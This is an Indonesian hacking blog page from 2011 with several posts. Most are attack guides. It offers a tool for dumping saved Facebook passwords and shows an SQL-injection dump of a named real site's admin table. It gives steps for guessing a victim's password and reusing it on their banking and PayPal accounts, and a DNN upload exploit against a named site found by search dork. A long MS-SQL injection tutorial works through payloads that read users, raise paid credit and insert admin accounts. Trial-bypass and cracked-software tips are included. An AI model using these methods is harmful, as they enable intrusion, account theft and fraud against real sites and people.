Selasa, 18 Oktober 2011

Facebook Password Decryptor

0 komentar
Banner
FacebookPasswordDecryptor adalah perangkat lunak GRATIS untuk segera memulihkan password account yang disimpan Facebook disimpan oleh web browser populer dan rasul. Sebagian besar aplikasi penyimpanan password Login untuk mencegah hassale dari masukan password setiap pengguna.
Features of FacebookPasswordDecryptor
Facebook Password Decryptor men-support recpvery dari password account yang tersimpan Facebook dari sebagian besar browser internet yang populer. Berikut adalah daftar lengkap aplikasi yang didukung.
  • Internet Explorer
  • Firefox
  • Google Chrome
  • Opera Browser
  • Apple Safari
  • Flock Browser
  • Paltalk Messenger
  • Miranda Messenger
Installing FacebookPasswordDecryptor
Meskipun FacebookPasswordDecryptor adalah tools yang portable, tapi tools ini diharuskan untuk menginstall dengan Installer sehingga Anda dapat menginstalnya secara lokal pada sistem anda untuk penggunaan reguler. Agan” dapat menggunakan Uninstaller untuk menghapus perangkat lunak dari sistem.

Installer
Using FacebookPasswordDecryptor
Using GUI Version
  • Jalankan Facebook Password Decryptor
  • Kemudian klik “Start Recovery” , maka semua password login facebook dari berbagai aplikasi yang digunakan akan ter- recover dengan sendirinya (screen 1).
  • Default password tidak ditampilkan untuk alasan keamanan karena data sensitif. Namun anda dapat mengklik tombol on’Show Password ‘di bagian bawah untuk melihat password tersebut.
  • Setelah itu anda dapat menyimpan semua recovery password dalam kedalam format txt maupun Html dengan memilih “export to text” atau “export to Html”.

Using Command-line Version
FacebookPasswordDecryptor.exe  “<output_file path>”
Contoh nye:
//Writes recovered password to text file in current directory
FacebookPasswordDecryptor.exe  output.txt
//Writes recovered password to HTML file in current directory
FacebookPasswordDecryptor.exe  output.html
//Writes recovered password to TEXT file
FacebookPasswordDecryptor.exe  “c:\my test\passlist”
Secara otomatis mendeteksi mode (teks atau html) dengan menggunakan ekstensi dari file yang ditentukan (txt atau html). Default (atau jika tidak ada ekstensi yang ditentukan) menggunakan mode TEXT (screen 2).
Screenshot hasil recover password facebook oleh Facebook Password Decryptor:
Main

Screenshot perintah dalam command line:
Command Line

List export data dalam bentuk Html menggunakan Facebook Password Decrypter
Export
Download : http://securityxploded.com/getfile_plus.php?id=2222

HACK BANK

0 komentar
Code:
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17--
[+] Evasion Used: "+" "--"
[+] 21:25:25
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,
[+] Column Length is: 5
[+] Found null column at column #: 1
[+] SQLi URL: http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,1,2,3,4--
[+] darkc0de URL: http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4
[-] Done!

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 21:26:39
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: k9bloodbank_com
User: hmziller@localhost
Version: 4.0.27-log
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 21:27:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: k9bloodbank_com
User: hmziller@localhost
Version: 4.0.27-log
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...

[+] Found a table called: admin

[+] Now searching for columns inside table "admin"
[!] Found a column called:username
[!] Found a column called:password
[!] Found a column called:id
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 21:29:03
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: k9bloodbank_com
User: hmziller@localhost
Version: 4.0.27-log
[+] Dumping data from database "k9bloodbank_com" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] -=[CENCORED BY ME....!!!!!!]=-

[-] [21:29:15]
[-] Total URL Requests 3
[-] Done


loginnya di
Code:
http://www.k9bloodbank.com/admin
SORRY ADA YG ANE RALAT ( SEMBUNYIKAN KARENA INI MERUGIKAN ORANG LAIN )

Hack akun Facebook

0 komentar

 

 HACKER SEJATI TIDAK AKAN MENYALAHG GUNAKAN NYA

 

Bukan karena MEREKA hebat bisa membobol keamanan Facebook, tapi karena ANDA SENDIRI yang memberikan password kepada MEREKA!!

Cara Ini Adalah Cara MANUAL & CLASSIC, Cara Bisa Anda Pakai Jika Semua Cara Sudah Gagal!
Jika Anda Sudah Merasa Jago, Silakan Tinggalkan Halaman Ini!

Step One

Request jadi teman victim / target di facebook.

Step Two

Lihat profilenya. Catat tanggal lahir, nama istri, pacar, anak, adik kakak, dan tanggal lahir mereka. Semua hal yang ada di facebooknya, sedetail-detailnya!

Step Three

Logout.  Coba-coba kombinasi password dari data profile yang victim berikan. Jika berhasil, lanjut ke Step Four. Jika Gagal kembali ke Step One.

Step Four

Jika account facebook victim berhasil masuk, coba-coba ke account social network victim lainnya, termasuk email, control panel website, paypal,internet banking dan lain-lain, karena kemungkinan victim menggunakan password yang sama sangat besar.

Step Five

Bersihkan data profile facebook account Anda dari hal-hal yang nyaris bahkan sama dengan password yang sedang Anda gunakan jika tidak ingin hal yang sama menimpa Anda.

‘it’s imposible Hacking Web di Hp

0 komentar
Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!
Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.
Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2
Kenapa pake 2 Web Browser ?
Lebih enak pake 2 browser di atas.alasannya adalah:
1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.
2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.
3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0
Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)
Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.
Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->
inurl:”/portals/0″  
And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234
Next, misalkan kita dah dpt targetnya nih…
Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
->http://site.com/[path]/portals/0/a.txt
Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.
Setelah dapet dan pasti vuln seperti site di bawah ini.
http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!
Setelah site target di buka di opmin 4.2
Pilih : file ( select a file on your site)
Tunggu biar loading selesai dan menampilkan 2 kolom:
Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)
Lalu klik ok….
Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.
Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone
Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-

5 Hacker TOP BLACK HACKER

0 komentar
5 orang dibawah ini merupakan top 5 black hat hacker ato lebih dikenal dengan hacker yang bandel, jail, dan nakal!! tapi jangan diraguin lagi kemampuan mereka!!
1.JONATHAN JAMES
Image
Sapa siy niy ni orang…?okay, James adalah orang amerika, saat baru umur 16 taun dia dikirm ke penjara karena kelakuannya didunia maya cuy..situs departemen pertahanan Amerika dibobol ama si James dan dia cuma bilang itu tantangan bagi dia n merupakan datu kesenangan tersendiri..wah gila juga ni orang;;
NASA juga kena keisengan dia, James nyuri software NASA ang diperkirakan seharga $1.7 juta dollar AS. sampe2 NASA dipaksa untuk mematikan server dan sistemnya!!!
Karena kelakuannya juga doi gak boleh megang komputer selama 10 tahun..kasian nih orang..haha
tapi sekarang doi udah dijalan yang bener dan bikin sebuah perusahaan keamanan dibidang komputer..mantab!!
2. ADRIAN LAMO
Ni orang juga sarap. doi ngebobol New York Times buat nedapetin info personal dan beberapa security number n ngebobol Microsoft (busyet gak tanggung2 dah). doi akhirnya didenda $65.000 dollar US,
Saat ini doi jadi pembicara dibeberapa acara seminar!! bravo dach!!

3. KEVIN MITNICK
Image
Kalo menurut gw inilah legenda hidup yang saat ini bener2 mantap dalam dunia hack.!!
Ni kelakuan doi:
* Menggunakan Los Angeles bus transfer system buat ngedapetin tumpangan gatis
* Mengelabui FBI
* Hacking kedalam DEC System(Digital Equipment Corporation)
* Ngedapetin administrator positon dalam satu komputer IBM biar menang judi, karena adminnya yang punya laptop IBM tersebut..haha
* Hacking Motorola, NEC, Nokia, Sun Microsystems dan Fujitsu Siemens systems
Dan masih banyak lagi kelakuan doi yang luar biasa
Seorang white hat hacker pun yang bernama Tsutomu Shimomura pun (ahli juga doi dan merupakan top 5 white hat hacker<hacker bae bae>), di hack komputer systemnya, dan terjadilah perang luar biasa..
Doi ketangkep dan kelacak oleh FBI dengan bantuan Tsutomu Shimomura yang ngelacak (tracking) lewat jaringan HP’ yang dibawa ama Mitnick saat itu..
Tapi sekarang doi dah tobat n jadi seorang penulis buku, konsultan security, dan pembicara.
4. KEVIN POULSEN

Juga dikenal dengan Dark Dante, doi ngehack database FBI (galak niy orang)
Selain itu doi juga ngehack seluruh lines phone station. Karena emang kemahiran dia ngehack lewat phone lines.
Saat ini, dia jadi senior editor di Wired News, dan berhasil mengengkap 744 penawaran sex melalui profiles Myspace..!!
Sukses dach gan!!
5. ROBERT TAPPAN MORIS
Image
Niy orang adalah orang yang pertama kali bikin Worm, yang dinamain Morris Worm (narsis niy orang)
Melalui internet doi nyebari wormnya yang mengakibatkan sekitar 6000 komputer jadi down..!!!
Dia akhirnya dipenjarakan rumah selama 3 tahun dan didenda sebesar $10.500 dollars
Sekarang doi kerja sebagai professor di sebuah MIT Computer Science and Artificial Intelligence Laboratory!!
HACKER LEGENDARIS
Bernama KARL KOCH berasal dari hannover Jerman ang ngenamain komputernya FUCKUP (First Universal Cybernetic-Kinetic Ultra-Micro Programmer), doi melakukan beberapa keberhasilan dalam ngehack pada kurun waktu 1985-1988. doi juga seorang cocaine addict!!
dia berhasil membobol beberapa sistem militer AS dan ngehacked sebuah pusat tenaga nuklir AS pada jaman perang dingin dan hasil hack’annya dijual ke KGB (Agen Rahasia Uni Soviet)
dia ditemukan tewas pada tahun 1988, menurut info dia membakar tubuhnya sendiri, namun siapa tau, ini konspirasi tingkat tinggi antara US dan Soviet pada perang dingin!!!
Mukanya ga ada yang serem yah..hehehehehe

Proses Hacker

0 komentar
Process Hacker adalah software dengan fitur yang dikemas untuk memanipulasi proses dan service pada komputer. Process Hacker merupakan opensource dan gratis yang digunakan untuk menampilkan proses yang ada dikomputer dan editor memori dengan fitur-fitur unik seperti penjelasan berikut:

Processes

  • View processes in a tree view with highlighting
  • View detailed process statistics and performance graphs
  • Process tooltips are detailed and show context-specific information
  • Select multiple processes and terminate, suspend or resume them
  • (32-bit only) Bypass almost all forms of process protection
  • Restart processes
  • Empty the working set of processes
  • Set affinity, priority and virtualization
  • Create process dumps
  • Use over a dozen methods to terminate processes
  • Detach processes from debuggers
  • View process heaps
  • View GDI handles
  • Inject DLLs
  • View DEP status, and even enable/disable DEP
  • View environment variables
  • View and edit process security descriptors
  • View image properties such as imports and exports

Threads

  • View thread start addresses and stacks with symbols
  • Threads are highlighted if suspended, or are GUI threads
  • Select multiple threads and terminate, suspend or resume them
  • Force terminate threads
  • View TEB addresses and view TEB contents
  • (32-bit only) Find out what a thread is doing, and what objects it is waiting on
  • View and edit thread security descriptors

Tokens

  • View full token details, including user, owner, primary group, session ID, elevation status, and more
  • View token groups
  • View privileges and even enable, disable or remove them
  • View and edit token security descriptors

Modules

  • View modules and mapped files in one list
  • Unload DLLs
  • View file properties and open them in Windows Explorer

Memory

  • View a virtual memory list
  • Read and modify memory using a hex editor
  • Dump memory to a file
  • Free or decommit memory
  • Scan for strings

Handles

  • View process handles, complete with highlighting for attributes
  • Search for handles (and DLLs and mapped files)
  • Close handles
  • (32-bit only) Set handle attributes – Protected and Inherit
  • Granted access of handles can be viewed symbolically instead of plain hex numbers
  • View detailed object properties when supported
  • View and edit object security descriptors

Services

  • View a list of all services
  • Create services
  • Start, stop, pause, continue or delete services
  • Edit service properties
  • View service dependencies and dependents
  • View and edit service security descriptors

Network

  • View a list of network connections
  • Close network connections
  • Use tools such as whois, traceroute and ping

Download Process Hacker  Tools:

HACK situs WEB ( bebahaya )

0 komentar
Hay  hacker ikuti cara cara beikut ini 

::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)

atau cara ke 2

::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :

www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam

urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol

database situs target.....

Belajar Hacking dengan game ini

0 komentar
ingin bisa nge hack ??
nieh disini aja . ane punya sesuatu untuk kalian yang ingin beljar untuk bisa hack .




nieh app termasuk game , y tapi kalau agan2 pengen bisa musti sabar soalnya nie game musti banyak di maenin supaya agan2 bisa bener2 ngerti ..
game ini lumayan seru , tapi agak lumayan susah juga sich .
but yang mencoba silahkan download hack the game


NB nanti anda akan di suruh memasukan id masukan  apa sajah terserah anda

Hacker Evolution Untold ( sofware sekaligus game para hacker )

0 komentar

Hacker Evolution Untold , merupakan sebuah game simulator atau lebih tepatnya lagi game simulasi hacking. Dalam game ini anda akan diberikan misi-misi dalam dunia hacking. Misalnya mencuri data, menyebarkan virus, mentransfer uang, dan sebagainya. Namun game ini bukan untuk alat pembelajaran dalam dunia kejahatan lho. Gunakan dengan bijak barangkali suatu saat nanti berguna.

Dalam game ini anda dituntut dapat berpikir secepat mungkin, setepat mungkin, dan seteliti mungkin. Jika anda pemula seperti saya, Karena memang game ini cukup menantang juga lho. Hehehe. Saya juga belum bisa memainkannya soalnya sangat membingungkan namun bikin penasaran. :D


Games ini ada game yang mengadopsi sistem hacking Brian Spencer berisi Logika Logika dasar hacking.
Cara Memainkan games ini mudah, hanya mengetik saja… tapi untuk menyelesaikannya anda harus menggunakan logika anda dan insting seorang hacker.
Pada level Pertama anda diberi clue lengkap untuk menyelesaikan semua misi pada level tersebut.
Di level Kedua anda hanya di beri clue pada awalnya saja.
Untuk level Ketiga dan selanjutnya anda tidak di beri clue sama sekali dan anda harus mencari tahu sendiri. Disini ketelitian anda diuji..
bagi yang mau ilahkan download disini Hacker Evolution Untold
Download Crack HEU

Password: dytoshare

HACKING SOFWARE TIRAL TO FOREVER

0 komentar
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbIcNh5_QmTOkW-rFdrakU1rdS6_ifAotUbrfr9O7GWCPuGHidbUdhyU7OpFwTCOruV5meGoXTCPoBviIZuXLnQnoyTOYk3p0jRJCQHhsvTStwAyTt76n3jh9xLTcl5f_XxpeLLp9JGfU/s200/Hacking+LAN.jpgDalam posting ini saya akan menunjukkan kepada Anda cara hack Software dan menjalankan program percobaan selamanya. Sebagian besar dari kita akrab dengan banyak software-software yang menjalankan hanya untuk jangka waktu tertentu dalam mode percobaan. Setelah masa percobaan habis software ini berhenti berfungsi dan permintaan untuk pembelian. Tapi ada cara untuk menjalankan software dan membuat mereka di luar fungsi masa percobaan. Bukankah ini menarik?

Sebelum saya memberitahu Anda cara hack perangkat lunak dan membuatnya berjalan dalam mode percobaan selamanya, kita harus mengerti fungsi software ini. Saya akan mencoba menjelaskan hal ini secara singkat.

Ketika software ini dipasang untuk pertama kalinya, mereka membuat entri ke dalam Registry Windows dengan rincian seperti Terpasang Tanggal dan Waktu, dipasang jalur dll Setelah instalasi setiap kali Anda menjalankan perangkat lunak, itu membandingkan sistem tanggal dan waktu dengan tanggal diinstal dan waktu. Jadi, dengan ini bisa melihat apakah masa percobaan berakhir atau tidak.

Maka dengan ini yang terjadi, hanya secara manual mengubah tanggal sistem ke tanggal yang lebih awal tidak akan menyelesaikan masalah. Untuk tujuan ini ada Tool kecil yang dikenal sebagai RunAsDate.

RunAsDate adalah utilitas kecil yang memungkinkan Anda untuk menjalankan sebuah program pada tanggal dan waktu yang Anda tentukan. Utilitas ini tidak mengubah tanggal sistem saat ini, tapi hanya menyuntikkan tanggal / waktu yang Anda tentukan ke aplikasi yang diinginkan.

RunAsDate memotong kernel API panggilan yang mengembalikan tanggal dan waktu dan menggantikan tanggal / waktu dengan tanggal / waktu yang Anda tentukan. It works with Windows 2000, XP, 2003 and Vista. Ia bekerja dengan Windows 2000, XP, 2003 dan Vista.

CATATAN: IKUTI TIPS INI DENGAN SEKSAMA

Anda harus ikuti tips hati-hati untuk berhasil hack software dan membuatnya berjalan dalam mode percobaan itu selamanya.

1. Catat tanggal dan waktu, ketika Anda menginstal perangkat lunak untuk pertama kalinya.

2. Setelah periode uji coba berakhir, Anda harus selalu menjalankan perangkat lunak menggunakan RunAsDate.

3. Setelah masa percobaan berakhir, jangan menjalankan perangkat lunak (program) secara langsung. . Jika Anda menjalankan perangkat lunak secara langsung sekali saja, hack ini mungkin tidak bekerja lagi.

4. Hal ini lebih baik dan aman untuk menyuntikkan tanggal hari terakhir dalam masa percobaan.

Misalnya, jika masa percobaan berakhir pada 3 JANUARI 2011, selalu menyuntikkan tanggal sebagai 29 Januari 2011 di RunAsDate. Saya harap ini membantu! Tunjukkan pengalaman dan pendapat Anda melalui komentar

Belajar Hacking buat pemula

0 komentar
Ok, di posting saya kali ini, saya akan mengulas lagi bagaimana cara untuk hacking website dan mendefacex untuk para pemula, jadi kita cukup menggunakan dork aja,,

pertama2 buka milw0rm,


Contoh target adalaha ourspace 2.0
